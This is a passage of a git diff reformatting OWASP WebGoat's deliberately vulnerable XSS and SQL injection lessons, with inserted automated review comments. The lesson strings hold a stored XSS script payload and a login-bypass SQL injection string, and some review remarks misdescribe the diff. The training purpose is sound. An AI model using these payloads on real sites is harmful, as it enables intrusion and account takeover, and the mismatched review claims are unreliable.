" - + "Implement a fix in the stored procedure to prevent the stored XSS from being written to the database. "; - if (getWebgoatContext().getDatabaseDriver().contains("jtds")) - instructions += "Use the provided user-defined function RegexMatch to test the data against a pattern. "; - instructions += "A sample regular expression pattern: ^[a-zA-Z0-9,\\. ]{0,80}$ " - + "Repeat stage 1 as 'Eric' with 'David' as the manager. Verify that 'David' is not affected by the attack."; + String stage = getStage(s); + if (STAGE1.equals(stage)) + { + instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.
" + + "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page. " + + "Verify that 'Jerry' is affected by the attack. " + + "A sample JavaScript snippet you can use is: <SCRIPT>alert('bang!');</SCRIPT>."; + } + else if (STAGE2.equals(stage)) + { + instructions = "Stage 2: Block Stored XSS using Input Validation.
" + + "Implement a fix in the stored procedure to prevent the stored XSS from being written to the database. "; + if (getWebgoatContext().getDatabaseDriver().contains("jtds")) + instructions += "Use the provided user-defined function RegexMatch to test the data against a pattern. "; + instructions += "A sample regular expression pattern: ^[a-zA-Z0-9,\\. ]{0,80}$ " + + "Repeat stage 1 as 'Eric' with 'David' as the manager. Verify that 'David' is not affected by the attack."; + } } + + return instructions; + } - return instructions; - - } - - @Override - public String[] getStages() { - if (getWebgoatContext().isCodingExercises()) - return new String[] {STAGE1, STAGE2}; - return new String[] {STAGE1}; - } - - public void handleRequest(WebSession s) - { - if (s.getLessonSession(this) == null) - s.openLessonSession(this); - - String requestedActionName = null; - try - { - requestedActionName = s.getParser().getStringParameter("action"); - } - catch (ParameterNotFoundException pnfe) - { - // Let them eat login page. 
- requestedActionName = LOGIN_ACTION; - } - - if (requestedActionName != null) - { - try - { - LessonAction action = getAction(requestedActionName); - - if (action != null) - { - if (!action.requiresAuthentication() - || action.isAuthenticated(s)) - { - action.handleRequest(s); - //setCurrentAction(s, action.getNextPage(s)); - } - } - else - { - setCurrentAction(s, ERROR_ACTION); - } - } - catch (ParameterNotFoundException pnfe) - { - System.out.println("Missing parameter"); - pnfe.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - catch (ValidationException ve) - { - System.out.println("Validation failed"); - ve.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - catch (UnauthenticatedException ue) - { - s.setMessage("Login failed"); - System.out.println("Authentication failure"); - ue.printStackTrace(); - } - catch (UnauthorizedException ue2) - { - s.setMessage("You are not authorized to perform this function"); - System.out.println("Authorization failure"); - ue2.printStackTrace(); - } - catch (Exception e) - { - // All other errors send the user to the generic error page - System.out.println("handleRequest() error"); - e.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - } - - // All this does for this lesson is ensure that a non-null content exists. 
- setContent(new ElementContainer()); - } - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the title attribute of the CrossSiteScripting object - * - * @return The title value - */ - public String getTitle() - { - return "LAB: DB Cross Site Scripting (XSS)"; - } - @Override - protected boolean getDefaultHidden() { + public String[] getStages() + { + if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2 }; + return new String[] { STAGE1 }; + } + + public void handleRequest(WebSession s) + { + if (s.getLessonSession(this) == null) s.openLessonSession(this); + + String requestedActionName = null; + try + { + requestedActionName = s.getParser().getStringParameter("action"); + } catch (ParameterNotFoundException pnfe) + { + // Let them eat login page. + requestedActionName = LOGIN_ACTION; + } + + if (requestedActionName != null) + { + try + { + LessonAction action = getAction(requestedActionName); + + if (action != null) + { + if (!action.requiresAuthentication() || action.isAuthenticated(s)) + { + action.handleRequest(s); + // setCurrentAction(s, action.getNextPage(s)); + } + } + else + { + setCurrentAction(s, ERROR_ACTION); + } + } catch (ParameterNotFoundException pnfe) + { + System.out.println("Missing parameter"); + pnfe.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (ValidationException ve) + { + System.out.println("Validation failed"); + ve.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (UnauthenticatedException ue) + { + s.setMessage("Login failed"); + System.out.println("Authentication failure"); + ue.printStackTrace(); + } catch (UnauthorizedException ue2) + { + s.setMessage("You are not authorized to perform this function"); + System.out.println("Authorization failure"); + ue2.printStackTrace(); + } catch (Exception e) + { + // All other errors send the user to the generic error page + System.out.println("handleRequest() error"); + 
e.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } + } + + // All this does for this lesson is ensure that a non-null content exists. + setContent(new ElementContainer()); + } + + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } + + /** + * Gets the title attribute of the CrossSiteScripting object + * + * @return The title value + */ + public String getTitle() + { + return "LAB: DB Cross Site Scripting (XSS)"; + } + + @Override + protected boolean getDefaultHidden() + { String driver = getWebgoatContext().getDatabaseDriver(); - boolean hidden = ! (driver.contains("oracle") || driver.contains("jtds")); + boolean hidden = !(driver.contains("oracle") || driver.contains("jtds")); return hidden; } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java index a09008621..087eaa05a 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.DBCrossSiteScripting; import java.sql.CallableStatement; @@ -5,9 +6,7 @@ import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; - import javax.servlet.http.HttpServletRequest; - import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial; import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction; 
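Review bot: The reformat leaves several `if` statements with an unbraced body on the condition line — `if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2 };` in `getStages`, `if (s.getLessonSession(this) == null) s.openLessonSession(this);` at the top of `handleRequest`, and the `contains("jtds")` line in `getInstructions` — which is easy to misread and to extend incorrectly; brace each body. The license header on the new side now opens with `/**` followed by ` * /*****`, which appears to turn the license text into the class Javadoc; a plain `/*` opener keeps it an ordinary comment. While the class is being touched, `new Integer(100)` for `DEFAULT_RANKING` can become `Integer.valueOf(100)`, and `List hints = new ArrayList();` in `getHints` can be `List<String> hints = new ArrayList<String>();` without changing the raw return type the superclass may declare.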
@@ -19,250 +18,223 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class UpdateProfile extends DefaultLessonAction { - private LessonAction chainedAction; + private LessonAction chainedAction; - - public UpdateProfile(GoatHillsFinancial lesson, String lessonName, - String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException, - ValidationException - { - if (isAuthenticated(s)) + public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) { - int userId = getIntSessionAttribute(s, getLessonName() + "." 
- + RoleBasedAccessControl.USER_ID); + super(lesson, lessonName, actionName); + this.chainedAction = chainedAction; + } - HttpServletRequest request = s.getRequest(); - int subjectId = Integer.parseInt(request.getParameter(DBCrossSiteScripting.EMPLOYEE_ID)); - String firstName = request.getParameter(DBCrossSiteScripting.FIRST_NAME); - String lastName = request.getParameter(DBCrossSiteScripting.LAST_NAME); - String ssn = request.getParameter(DBCrossSiteScripting.SSN); - String title = request.getParameter(DBCrossSiteScripting.TITLE); - String phone = request.getParameter(DBCrossSiteScripting.PHONE_NUMBER); - String address1 = request.getParameter(DBCrossSiteScripting.ADDRESS1); - String address2 = request.getParameter(DBCrossSiteScripting.ADDRESS2); - int manager = Integer.parseInt(request - .getParameter(DBCrossSiteScripting.MANAGER)); - String startDate = request.getParameter(DBCrossSiteScripting.START_DATE); - int salary = Integer.parseInt(request - .getParameter(DBCrossSiteScripting.SALARY)); - String ccn = request.getParameter(DBCrossSiteScripting.CCN); - int ccnLimit = Integer.parseInt(request - .getParameter(DBCrossSiteScripting.CCN_LIMIT)); - String disciplinaryActionDate = request - .getParameter(DBCrossSiteScripting.DISCIPLINARY_DATE); - String disciplinaryActionNotes = request - .getParameter(DBCrossSiteScripting.DISCIPLINARY_NOTES); - String personalDescription = request - .getParameter(DBCrossSiteScripting.DESCRIPTION); + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException, ValidationException + { + if (isAuthenticated(s)) + { + int userId = getIntSessionAttribute(s, getLessonName() + "." 
+ RoleBasedAccessControl.USER_ID); - Employee employee = new Employee(subjectId, firstName, lastName, ssn, - title, phone, address1, address2, manager, startDate, salary, - ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes, - personalDescription); + HttpServletRequest request = s.getRequest(); + int subjectId = Integer.parseInt(request.getParameter(DBCrossSiteScripting.EMPLOYEE_ID)); + String firstName = request.getParameter(DBCrossSiteScripting.FIRST_NAME); + String lastName = request.getParameter(DBCrossSiteScripting.LAST_NAME); + String ssn = request.getParameter(DBCrossSiteScripting.SSN); + String title = request.getParameter(DBCrossSiteScripting.TITLE); + String phone = request.getParameter(DBCrossSiteScripting.PHONE_NUMBER); + String address1 = request.getParameter(DBCrossSiteScripting.ADDRESS1); + String address2 = request.getParameter(DBCrossSiteScripting.ADDRESS2); + int manager = Integer.parseInt(request.getParameter(DBCrossSiteScripting.MANAGER)); + String startDate = request.getParameter(DBCrossSiteScripting.START_DATE); + int salary = Integer.parseInt(request.getParameter(DBCrossSiteScripting.SALARY)); + String ccn = request.getParameter(DBCrossSiteScripting.CCN); + int ccnLimit = Integer.parseInt(request.getParameter(DBCrossSiteScripting.CCN_LIMIT)); + String disciplinaryActionDate = request.getParameter(DBCrossSiteScripting.DISCIPLINARY_DATE); + String disciplinaryActionNotes = request.getParameter(DBCrossSiteScripting.DISCIPLINARY_NOTES); + String personalDescription = request.getParameter(DBCrossSiteScripting.DESCRIPTION); - try - { - if (subjectId > 0) - { - this.changeEmployeeProfile(s, userId, subjectId, employee); - setRequestAttribute(s, getLessonName() + "." 
- + DBCrossSiteScripting.EMPLOYEE_ID, Integer - .toString(subjectId)); - if (DBCrossSiteScripting.STAGE1.equals(getStage(s))) + Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2, + manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes, + personalDescription); + + try { - address1 = address1.toLowerCase(); - boolean pass = address1.contains(""); - if (pass) + if (subjectId > 0) { - setStageComplete(s, DBCrossSiteScripting.STAGE1); + this.changeEmployeeProfile(s, userId, subjectId, employee); + setRequestAttribute(s, getLessonName() + "." + DBCrossSiteScripting.EMPLOYEE_ID, Integer + .toString(subjectId)); + if (DBCrossSiteScripting.STAGE1.equals(getStage(s))) + { + address1 = address1.toLowerCase(); + boolean pass = address1.contains(""); + if (pass) + { + setStageComplete(s, DBCrossSiteScripting.STAGE1); + } + } } + else + this.createEmployeeProfile(s, userId, employee); + } catch (SQLException e) + { + s.setMessage("Error updating employee profile"); + e.printStackTrace(); + if (DBCrossSiteScripting.STAGE2.equals(getStage(s)) + && (e.getMessage().contains("ORA-06512") || e.getMessage().contains("Illegal characters")) + && !employee.getAddress1().matches("^[a-zA-Z0-9,\\. ]{0,80}$")) + { + setStageComplete(s, DBCrossSiteScripting.STAGE2); + } + + } catch (ClassNotFoundException e) + { + s.setMessage("Error updating employee profile"); + e.printStackTrace(); } - } - else - this.createEmployeeProfile(s, userId, employee); - } - catch (SQLException e) - { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); - if (DBCrossSiteScripting.STAGE2.equals(getStage(s)) && - (e.getMessage().contains("ORA-06512") || e.getMessage().contains("Illegal characters")) && - !employee.getAddress1().matches("^[a-zA-Z0-9,\\. 
]{0,80}$")) - { - setStageComplete(s, DBCrossSiteScripting.STAGE2); - } - } - catch (ClassNotFoundException e) - { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); - } - - try - { - chainedAction.handleRequest(s); - } - catch (UnauthenticatedException ue1) - { - System.out.println("Internal server error"); - ue1.printStackTrace(); - } - catch (UnauthorizedException ue2) - { - System.out.println("Internal server error"); - ue2.printStackTrace(); - } + try + { + chainedAction.handleRequest(s); + } catch (UnauthenticatedException ue1) + { + System.out.println("Internal server error"); + ue1.printStackTrace(); + } catch (UnauthorizedException ue2) + { + System.out.println("Internal server error"); + ue2.printStackTrace(); + } + } + else + throw new UnauthenticatedException(); } - else - throw new UnauthenticatedException(); - } - public String getNextPage(WebSession s) - { - return DBCrossSiteScripting.VIEWPROFILE_ACTION; - } - - - public void changeEmployeeProfile(WebSession s, int userId, int subjectId, - Employee employee) throws SQLException, ClassNotFoundException - { - try - { - String update = " { CALL UPDATE_EMPLOYEE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) 
}"; - CallableStatement call = WebSession.getConnection(s).prepareCall(update); - // Note: The password field is ONLY set by ChangePassword - call.setInt(1, userId); - call.setString(2, employee.getFirstName()); - call.setString(3, employee.getLastName()); - call.setString(4, employee.getSsn()); - call.setString(5, employee.getTitle()); - call.setString(6, employee.getPhoneNumber()); - call.setString(7, employee.getAddress1()); - call.setString(8, employee.getAddress2()); - call.setInt(9, employee.getManager()); - call.setString(10, employee.getStartDate()); - call.setInt(11, employee.getSalary()); - call.setString(12, employee.getCcn()); - call.setInt(13, employee.getCcnLimit()); - call.setString(14, employee.getDisciplinaryActionDate()); - call.setString(15, employee.getDisciplinaryActionNotes()); - call.setString(16, employee.getPersonalDescription()); - call.executeUpdate(); - } - catch (ClassNotFoundException e) - { - e.printStackTrace(); - } - } - - public void createEmployeeProfile(WebSession s, int userId, - Employee employee) throws UnauthorizedException - { - try + public String getNextPage(WebSession s) { + return DBCrossSiteScripting.VIEWPROFILE_ACTION; + } + + public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee) throws SQLException, + ClassNotFoundException + { + try + { + String update = " { CALL UPDATE_EMPLOYEE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) 
}"; + CallableStatement call = WebSession.getConnection(s).prepareCall(update); + // Note: The password field is ONLY set by ChangePassword + call.setInt(1, userId); + call.setString(2, employee.getFirstName()); + call.setString(3, employee.getLastName()); + call.setString(4, employee.getSsn()); + call.setString(5, employee.getTitle()); + call.setString(6, employee.getPhoneNumber()); + call.setString(7, employee.getAddress1()); + call.setString(8, employee.getAddress2()); + call.setInt(9, employee.getManager()); + call.setString(10, employee.getStartDate()); + call.setInt(11, employee.getSalary()); + call.setString(12, employee.getCcn()); + call.setInt(13, employee.getCcnLimit()); + call.setString(14, employee.getDisciplinaryActionDate()); + call.setString(15, employee.getDisciplinaryActionNotes()); + call.setString(16, employee.getPersonalDescription()); + call.executeUpdate(); + } catch (ClassNotFoundException e) + { + e.printStackTrace(); + } + } + + public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException + { + try + { int nextId = getNextUID(s); - String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)"; + String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)"; - try - { - PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query); + try + { + PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query); - ps.setString(1, employee.getFirstName().toLowerCase()); - ps.setString(2, employee.getLastName()); - ps.setString(3, employee.getSsn()); - ps.setString(4, employee.getTitle()); - ps.setString(5, employee.getPhoneNumber()); - ps.setString(6, employee.getAddress1()); - ps.setString(7, employee.getAddress2()); - ps.setInt(8, employee.getManager()); - ps.setString(9, employee.getStartDate()); - ps.setString(10, employee.getCcn()); - ps.setInt(11, employee.getCcnLimit()); - ps.setString(12, 
employee.getDisciplinaryActionDate()); - ps.setString(13, employee.getDisciplinaryActionNotes()); - ps.setString(14, employee.getPersonalDescription()); + ps.setString(1, employee.getFirstName().toLowerCase()); + ps.setString(2, employee.getLastName()); + ps.setString(3, employee.getSsn()); + ps.setString(4, employee.getTitle()); + ps.setString(5, employee.getPhoneNumber()); + ps.setString(6, employee.getAddress1()); + ps.setString(7, employee.getAddress2()); + ps.setInt(8, employee.getManager()); + ps.setString(9, employee.getStartDate()); + ps.setString(10, employee.getCcn()); + ps.setInt(11, employee.getCcnLimit()); + ps.setString(12, employee.getDisciplinaryActionDate()); + ps.setString(13, employee.getDisciplinaryActionNotes()); + ps.setString(14, employee.getPersonalDescription()); - ps.execute(); - } - catch (SQLException sqle) - { - s.setMessage("Error updating employee profile"); - sqle.printStackTrace(); - } + ps.execute(); + } catch (SQLException sqle) + { + s.setMessage("Error updating employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error updating employee profile"); + e.printStackTrace(); + } } - catch (Exception e) - { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); - } - } - private int getNextUID(WebSession s) - { - int uid = -1; - try + private int getNextUID(WebSession s) { - Statement statement = WebSession.getConnection(s).createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement - .executeQuery("select max(userid) as uid from employee"); - results.first(); - uid = results.getInt("uid"); + int uid = -1; + try + { + Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + ResultSet results = statement.executeQuery("select max(userid) as uid from employee"); + results.first(); + uid = results.getInt("uid"); + } catch (SQLException sqle) + { + 
sqle.printStackTrace(); + s.setMessage("Error updating employee profile"); + } catch (ClassNotFoundException e) + { + // TODO Auto-generated catch block + e.printStackTrace(); + } + return uid + 1; } - catch (SQLException sqle) - { - sqle.printStackTrace(); - s.setMessage("Error updating employee profile"); - } - catch (ClassNotFoundException e) - { - // TODO Auto-generated catch block - e.printStackTrace(); - } - return uid + 1; - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java index 5d86f373d..287be6ce2 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.DBSQLInjection; import java.util.ArrayList; 
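Review bot: In handleRequest's `catch (SQLException e)` block, `e.getMessage().contains("ORA-06512")` dereferences the message without a null check, so if a driver raises an SQLException with a null message the handled error becomes a NullPointerException that escapes handleRequest; guard it with `String msg = e.getMessage() == null ? "" : e.getMessage();` and test `msg` in the two `contains` calls. The STAGE1 completion test `boolean pass = address1.contains("");` is always true, so any successful update of an existing profile marks the stage complete — if that is a placeholder for the intended address check, a comment saying so would help, e.g. `// placeholder: every address passes this check`. Separately, the `CallableStatement` in changeEmployeeProfile, the `PreparedStatement` in createEmployeeProfile and the `Statement`/`ResultSet` in getNextUID are never closed, and getNextUID ignores the boolean returned by `results.first()`; closing them in a `finally` block (or try-with-resources if the build targets Java 7 or later) and checking `if (results.first())` before `getInt` would avoid leaking driver resources on every request and a spurious SQLException on an empty table.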
@@ -20,241 +21,224 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class DBSQLInjection extends GoatHillsFinancial { - private final static Integer DEFAULT_RANKING = new Integer(75); + private final static Integer DEFAULT_RANKING = new Integer(75); - public final static int PRIZE_EMPLOYEE_ID = 112; + public final static int PRIZE_EMPLOYEE_ID = 112; - public final static String PRIZE_EMPLOYEE_NAME = "Neville Bartholomew"; + public final static String PRIZE_EMPLOYEE_NAME = "Neville Bartholomew"; - public final static String STAGE1 = "String SQL Injection"; - - public final static String STAGE2 = "Block SQL Injection using Bind Variables"; - - public void registerActions(String className) - { - registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); - registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); - registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); - registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); - registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); + public final static String STAGE1 = "String SQL Injection"; - // These actions are special in that they chain to other actions. 
- registerAction(new Login(this, className, LOGIN_ACTION, - getAction(LISTSTAFF_ACTION))); - registerAction(new Logout(this, className, LOGOUT_ACTION, - getAction(LOGIN_ACTION))); - registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, - getAction(VIEWPROFILE_ACTION))); - registerAction(new UpdateProfile(this, className, - UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); - registerAction(new DeleteProfile(this, className, - DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); - } + public final static String STAGE2 = "Block SQL Injection using Bind Variables"; - /** - * Gets the category attribute of the CrossSiteScripting object - * - * @return The category value - */ - public Category getDefaultCategory() - { - return Category.INJECTION; - } - - /** - * Gets the hints attribute of the DirectoryScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints - .add("The application is taking your input and inserting it at the end of a pre-formed SQL command."); - hints - .add("This is the code for the query being built and issued by WebGoat:

" - + "stmt := 'SELECT USERID FROM EMPLOYEE WHERE USERID = ' || v_id || ' AND PASSWORD = ''' || v_password || '''';
" - + "EXECUTE IMMEDIATE stmt INTO v_userid;"); - hints - .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " - + "Remember: You need to end up with a SQL statement that only returns one row, since we are using an INTO clause"); - - // Stage 1 - hints - .add("You may need to use WebScarab to remove a field length limit to fit your attack."); - hints.add("Try entering a password of [ ' OR userid=112 OR password=' ]."); - - // Stage 2 - hints - .add("Change the Stored procedure to use bind variables."); - - return hints; - } - - @Override - public String[] getStages() { - if (getWebgoatContext().isCodingExercises()) - return new String[] {STAGE1, STAGE2}; - return new String[] {STAGE1}; - } - - /** - * Gets the instructions attribute of the ParameterInjection object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = ""; - - if (!getLessonTracker(s).getCompleted()) + public void registerActions(String className) { - String stage = getStage(s); - if (STAGE1.equals(stage)) - { - instructions = "Stage 1: Use String SQL Injection to bypass authentication. " - + "The goal here is to login as the user " - + PRIZE_EMPLOYEE_NAME - + ", who is in the Admin group. " - + "You do not have the password, but the form is SQL injectable. " - + "View the EMPLOYEE_LOGIN stored procedure and see if you can " - + "determine why the exploit exists."; - } - else if (STAGE2.equals(stage)) - { - instructions = "Stage 2: Use bind variables.
" - + "Using the Squirrel SQL Client, update the EMPLOYEE_LOGIN stored procedure in the database " - + "to use bind variables, rather than string concatenation. " - + "Repeat the SQL Injection attack. Verify that the attack is no longer effective."; - } + registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); + registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); + registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); + registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); + registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); + + // These actions are special in that they chain to other actions. + registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION))); + registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION))); + registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); + registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); + registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); } - return instructions; - } - - public void handleRequest(WebSession s) - { - if (s.getLessonSession(this) == null) - s.openLessonSession(this); - - String requestedActionName = null; - try + /** + * Gets the category attribute of the CrossSiteScripting object + * + * @return The category value + */ + public Category getDefaultCategory() { - requestedActionName = s.getParser().getStringParameter("action"); + return Category.INJECTION; } - catch (ParameterNotFoundException pnfe) + + /** + * Gets the hints attribute of the DirectoryScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) { - // Let them eat login page. 
- requestedActionName = LOGIN_ACTION; + List hints = new ArrayList(); + hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command."); + hints + .add("This is the code for the query being built and issued by WebGoat:

" + + "stmt := 'SELECT USERID FROM EMPLOYEE WHERE USERID = ' || v_id || ' AND PASSWORD = ''' || v_password || '''';
" + + "EXECUTE IMMEDIATE stmt INTO v_userid;"); + hints + .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " + + "Remember: You need to end up with a SQL statement that only returns one row, since we are using an INTO clause"); + + // Stage 1 + hints.add("You may need to use WebScarab to remove a field length limit to fit your attack."); + hints.add("Try entering a password of [ ' OR userid=112 OR password=' ]."); + + // Stage 2 + hints.add("Change the Stored procedure to use bind variables."); + + return hints; } - if (requestedActionName != null) - { - try - { - LessonAction action = getAction(requestedActionName); - if (action != null) - { - //System.out.println("CrossSiteScripting.handleRequest() dispatching to: " + action.getActionName()); - if (!action.requiresAuthentication() - || action.isAuthenticated(s)) - { - action.handleRequest(s); - //setCurrentAction(s, action.getNextPage(s)); - } - } - else - setCurrentAction(s, ERROR_ACTION); - } - catch (ParameterNotFoundException pnfe) - { - System.out.println("Missing parameter"); - pnfe.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - catch (ValidationException ve) - { - System.out.println("Validation failed"); - ve.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - catch (UnauthenticatedException ue) - { - s.setMessage("Login failed"); - System.out.println("Authentication failure"); - ue.printStackTrace(); - } - catch (UnauthorizedException ue2) - { - s.setMessage("You are not authorized to perform this function"); - System.out.println("Authorization failure"); - ue2.printStackTrace(); - } - catch (Exception e) - { - // All other errors send the user to the generic error page - System.out.println("handleRequest() error"); - e.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - } - - // All this does for this lesson is ensure that a non-null content exists. 
